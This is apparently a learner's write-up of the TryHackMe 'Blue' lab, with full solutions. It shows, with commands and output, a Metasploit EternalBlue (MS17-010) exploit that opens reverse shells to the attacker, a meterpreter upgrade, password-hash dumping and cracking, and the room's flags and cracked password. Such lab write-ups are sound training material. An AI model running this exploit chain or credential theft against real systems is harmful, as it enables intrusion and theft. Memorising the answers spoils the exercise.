Blue writeup [thm]
Deploy & hack into a Windows machine, leveraging common misconfigurations issues.
Blue is the third challenge in the Getting Started section on the Offensive Pentesting path.
Warning, this writeup contains full solutions.
Recon
Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)
$: nmap -sV -sC --script vuln -oN blue.nmap
We get a lot of interesting information:
Nmap 7.91 scan initiated Mon May 17 17:57:40 2021 as: nmap -sV -sC --script vuln -oN blue.nmap $target Nmap scan report for $target Host is up (0.047s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 3389/tcp open ssl/ms-wbt-server? | rdp-vuln-ms12-020: | VULNERABLE: | MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability | State: VULNERABLE | IDs: CVE:CVE-2012-0152 | Risk factor: Medium CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P) | Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service. | | Disclosure date: 2012-03-13 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152 | http://technet.microsoft.com/en-us/security/bulletin/ms12-020 | | MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability | State: VULNERABLE | IDs: CVE:CVE-2012-0002 | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) | Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system. | | Disclosure date: 2012-03-13 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002 |_ http://technet.microsoft.com/en-us/security/bulletin/ms12-020 |_ssl-ccs-injection: No reply from server (TIMEOUT) |_sslv2-drown: 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC 49159/tcp open msrpc Microsoft Windows RPC Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done at Mon May 17 17:59:24 2021 -- 1 IP address (1 host up) scanned in 103.42 seconds
How many ports are open with a port number under 1000?
Only 3.
What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
smb-vuln-ms17-010: VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) State: VULNERABLE IDs: CVE:CVE-2017-0143 Risk factor: HIGH A critical remote code execution vulnerability exists in Microsoft SMBv1 servers (ms17-010).
ms17-010. EternalBlue (patched by Microsoft via MS17-010) is a security flaw related to how a Windows SMB 1.0 (SMBv1) server handles certain requests. If successfully exploited, it can allow attackers to execute arbitrary code in the target system. EternalBlue was developed by the NSA.
Gain Access
Start Metasploit
$: msfconsole init [!] The following modules could not be loaded!..| [!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go [!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go [!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go [!] Please see /home/$usr/.msf4/logs/framework.log for details. _ _ / \ /\ __ _ __ /_/ __ | |\ / | _____ \ \ ___ _____ | | / \ _ \ \ | | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| |_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ =[ metasploit v6.0.36-dev ] + -- --=[ 2106 exploits - 1131 auxiliary - 357 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 8 evasion ] Metasploit tip: Use the edit command to open the currently active module in your editor msf6 > search ms17-010 Matching Modules ================ i Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce msf6 > use 2 [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) >
Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)
Given above: exploit/windows/smb/ms17_010_eternalblue
Show options and set the one required value. What is the name of this value? (All caps for submission)
msf6 exploit(windows/smb/ms17_010_eternalblue) > options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.x.x yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS $target RHOSTS => $target
Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter: set payload windows/x64/shell/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp payload => windows/x64/shell/reverse_tcp
Set LHOST to the THM VPN tunnel IP:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST $tunip LHOST => $tunip
With that done, run the exploit!
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit Started reverse TCP handler on $tunip:4444 $target:445 - Executing automatic check (disable AutoCheck to override) $target:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check $target:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) $target:445 - Scanned 1 of 1 hosts (100% complete) $target:445 - The target is vulnerable. $target:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check $target:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) $target:445 - Scanned 1 of 1 hosts (100% complete) $target:445 - Connecting to target for exploitation. $target:445 - Connection established for exploitation. $target:445 - Target OS selected valid for OS indicated by SMB reply $target:445 - CORE raw buffer dump (42 bytes) $target:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes $target:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv $target:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 $target:445 - Target arch selected valid for arch indicated by DCE/RPC reply $target:445 - Trying exploit with 12 Groom Allocations. $target:445 - Sending all but last fragment of exploit packet $target:445 - Starting non-paged pool grooming $target:445 - Sending SMBv2 buffers $target:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. $target:445 - Sending final SMBv2 buffers. $target:445 - Sending last fragment of exploit packet! $target:445 - Receiving response from exploit packet $target:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! $target:445 - Sending egg to corrupted connection. $target:445 - Triggering free of corrupted buffer. Sending stage (336 bytes) to $target Command shell session 1 opened ($tunip:4444 -> $target:49193) at 2021-05-17 18:07:59 +0200 $target:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= $target:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= $target:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>
Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
C:\Windows\system32>^Z Background session 1? [y/N] y msf6 exploit(windows/smb/ms17_010_eternalblue) >
Escalate
Escalate privileges, learn how to upgrade shells in metasploit.
If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
post/multi/manage/shell_to_meterpreter
msf6 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter Matching Modules ================ i Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/multi/manage/shell_to_meterpreter normal No Shell to Meterpreter Upgrade Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0 msf6 post(multi/manage/shell_to_meterpreter) > msf6 post(multi/manage/shell_to_meterpreter) > options Module options (post/multi/manage/shell_to_meterpreter): Name Current Setting Required Description ---- --------------- -------- ----------- HANDLER true yes Start an exploit/multi/handler to receive the connection LHOST no IP of host that will receive the connection from the payload (Will try to auto detect). LPORT 4433 yes Port for payload to connect to. SESSION yes The session to run this module on.
Find and set the session id:
msf6 post(multi/manage/shell_to_meterpreter) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell x64/windows $tunip:4444 -> $target:49193 ($target) msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1 SESSION => 1 msf6 post(multi/manage/shell_to_meterpreter) > exploit [*] Upgrading session ID: 1 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on $tunip:4433 [*] Post module execution completed [*] Sending stage (175174 bytes) to $target [*] Meterpreter session 2 opened ($tunip:4433 -> $target:49203) at 2021-05-17 18:15:37 +0200 [*] Stopping exploit/multi/handler
Switch to the meterpreter shell:
msf6 post(multi/manage/shell_to_meterpreter) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell x64/windows $tunip:4444 -> $target:49193 ($target) 2 meterpreter x86/windows NT AUTHORITY\SYSTEM @ JON-PC $tunip:4433 -> $target:49203 ($target) msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2 [*] Starting interaction with 2... meterpreter >
Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
Nice!
List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).
meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System x64 0 416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe 432 660 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe 460 708 svchost.exe x64 0 NT AUTHORITY\SYSTEM 560 552 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe 612 552 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe 620 600 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe 660 600 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe 696 708 svchost.exe x64 0 NT AUTHORITY\SYSTEM 708 612 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe 716 612 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe 724 612 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe 832 708 svchost.exe x64 0 NT AUTHORITY\SYSTEM 900 708 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE 916 560 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe 924 708 svchost.exe x64 0 NT AUTHORITY\SYSTEM 948 708 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1088 708 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1184 708 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE 1308 708 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe 1344 708 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1404 708 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe 1480 708 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe 1616 708 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe 1696 396 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 1728 1696 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe 1776 708 powercfg.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\powercfg.exe 1800 560 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe 1944 708 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE 1976 1308 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\cmd.exe 2012 708 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM 2100 832 WmiPrvSE.exe 2312 560 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe 2420 708 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE 2436 708 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2648 708 vds.exe x64 0 NT AUTHORITY\SYSTEM 2736 708 svchost.exe x64 0 NT AUTHORITY\SYSTEM 2784 708 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
The spool service, spoolsv.exe, is a good choice. It's the printer process and it always runs as NT AUTHORY. It also respawns if killed and matches architecture.
1308 708 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
We try to migrate to pid 1308:
meterpreter > migrate 1308 [*] Migrating from 1728 to 1308... [*] Migration completed successfully.
Cracking
Dump the non-default user's password and crack it!
Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Copy this password hash to a file and research how to crack it. What is the cracked password?
$: john --format=NT jon.hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (NT [MD4 128/128 AVX 4x3]) Warning: no OpenMP support for this hash type, consider --fork=2 Press 'q' or Ctrl-C to abort, almost any other key for status alqfna22 (Jon) 1g 0:00:00:00 DONE (2021-05-17 21:19) 1.111g/s 11333Kp/s 11333Kc/s 11333KC/s alqui..alpusidi Use the "--show --format=NT" options to display all of the cracked passwords reliably Session completed $: john --format=NT jon.hash --show Jon:alqfna22:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d::: 1 password hash cracked, 0 left
Find flags!
Find the three flags planted on this machine. These are not traditional flags, rather, they're meant to represent key locations within the Windows system. Use the hints provided below to complete this room!
Flag1? This flag can be found at the system root.
meterpreter > pwd C:\Windows\system32 meterpreter > cd ../../ meterpreter > ls Listing: C:\ ============ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2009-07-14 05:18:56 +0200 $Recycle.Bin 40777/rwxrwxrwx 0 dir 2009-07-14 07:08:56 +0200 Documents and Settings 40777/rwxrwxrwx 0 dir 2009-07-14 05:20:08 +0200 PerfLogs 40555/r-xr-xr-x 4096 dir 2009-07-14 05:20:08 +0200 Program Files 40555/r-xr-xr-x 4096 dir 2009-07-14 05:20:08 +0200 Program Files (x86) 40777/rwxrwxrwx 4096 dir 2009-07-14 05:20:08 +0200 ProgramData 40777/rwxrwxrwx 0 dir 2018-12-13 04:13:22 +0100 Recovery 40777/rwxrwxrwx 4096 dir 2018-12-13 00:01:17 +0100 System Volume Information 40555/r-xr-xr-x 4096 dir 2009-07-14 05:20:08 +0200 Users 40777/rwxrwxrwx 16384 dir 2009-07-14 05:20:08 +0200 Windows 100666/rw-rw-rw- 24 fil 2018-12-13 04:47:39 +0100 flag1.txt 0000/--------- 2727648 fif 1971-10-21 15:45:36 +0100 hiberfil.sys 0000/--------- 2727648 fif 1971-10-21 15:45:36 +0100 pagefile.sys meterpreter > cat flag1.txt flag{access_the_machine}
Flag2? This flag can be found at the location where passwords are stored within Windows.
meterpreter > pwd C:\windows\system32\config meterpreter > cat flag2.txt flag{sam_database_elevated_access}
flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
meterpreter > pwd C:\users\jon\Documents meterpreter > cat flag3.txt flag{admin_documents_can_be_valuable}meterpreter >
Conclusion
Similarly to BurpSuit, using Metasploit feels like "cheating". On the other hand Metasploit seems like a very powerful framework. I've only scratched the surface and I'm looking forward to using it more in the future.
I've been using Linux exclusively for so many years now that I've forgotten most things about Windows. I assumed that I would remember where the SAM file lives but nope I had to google that. Maybe I should brush up on my Windows skills.
It was a strange feeling to use an NSA exploit.
This was perhaps more of a walkthrough than a challenge but fun nevertheless.
Tools used:
- Nmap
- Metasploit
- John the Ripper